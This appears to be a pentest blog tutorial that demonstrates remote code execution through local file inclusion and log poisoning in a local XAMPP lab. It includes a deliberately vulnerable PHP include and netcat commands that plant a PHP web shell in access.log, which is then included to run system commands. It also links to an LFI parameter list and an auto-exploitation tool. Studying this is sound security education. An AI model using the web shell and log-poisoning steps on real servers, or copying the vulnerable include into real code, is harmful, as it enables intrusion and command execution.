rce-via-lfi-log-poisoning

RCE via LFI Log Poisoning

Hello everyone! Welcome to pentestguy, In this article, we are focusing on RCE via LFI log poisoning. As we all know RCE or remote control execution is one of the most critical vulnerabilities and you can perform it via LFI log poisoning. But most people are confused with log poisoning and LFI. here is a simple explanation.

We know whenever we are making any request to the server it will log that request whether it’s good or bad (simply no matter what request comes and what response goes) it logs everything. Yeah..!! I was talking about a web server.

For example: If an attacker finds a local file inclusion vulnerability on a web application whether that attacker can include local files from that server and able to expose some sensitive files. But what if that attacker can include a log file(very important to have permission to that log file)? so an attacker can execute code remotely.

Lab Setup

  1. Windows/Linux
  2. XAMPP

If you are using Windows along with xampp make sure that you place the below code into htdocs folder located in C:\xampp\htdocs and save the file with a .php extension.

<?php
    include($_GET['file']);
?>

The above vulnerable code has a file parameter which able to include other files. An attacker is simply able to include files.

lfi-path-php

For example, http://192.168.1.8/lfi/path.php?file=home.php , make sure that home.php needs are present in htdocs folder(In the above case place all files in lfi directory inside htdocs).

Now, you need to perform log poisoning for that going to use nc (netcat) here is the basic tutorial of netcat https://pentestguy.com/the-ultimate-guide-to-netcat/

First, let’s check if our request getting log or not for that use the command given below.

nc -nv target ip/url 80 
Hello PentestGuy //this is a message

test-log-poisoning

Check the access.log file and you will find your last request with a message.

check-for-sample-log

Now, let’s send malicious php code using netcat and it will log into the access.log file and after that will include that file via file parameter from the above vulnerable code.

nc -nv 192.168.1.8 80
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

rce-via-log-poisoning

Access url and provide the command that you want to execute.

ipconfig-command-to-poc-of-rce

In the above example, run the command ipconfig through the cmd parameter.
For Linux, the process is the same but make sure that the log file has permission. A simple way to check it is by including a log file.

Top 25 LFI parameters: https://raw.githubusercontent.com/lutfumertceylan/top25-parameter/master/lfi-parameters.txt

Use LFISuite for automatic exploitation: https://github.com/D35m0nd142/LFISuite

You can also check the video tutorial for easy learning.

If you found this post helpful then please share it with your co-workers and friends. Please provide your valuable comments and let us know if there are any suggestions. Now you can also collaborate with us please check our collaboration page, thank you!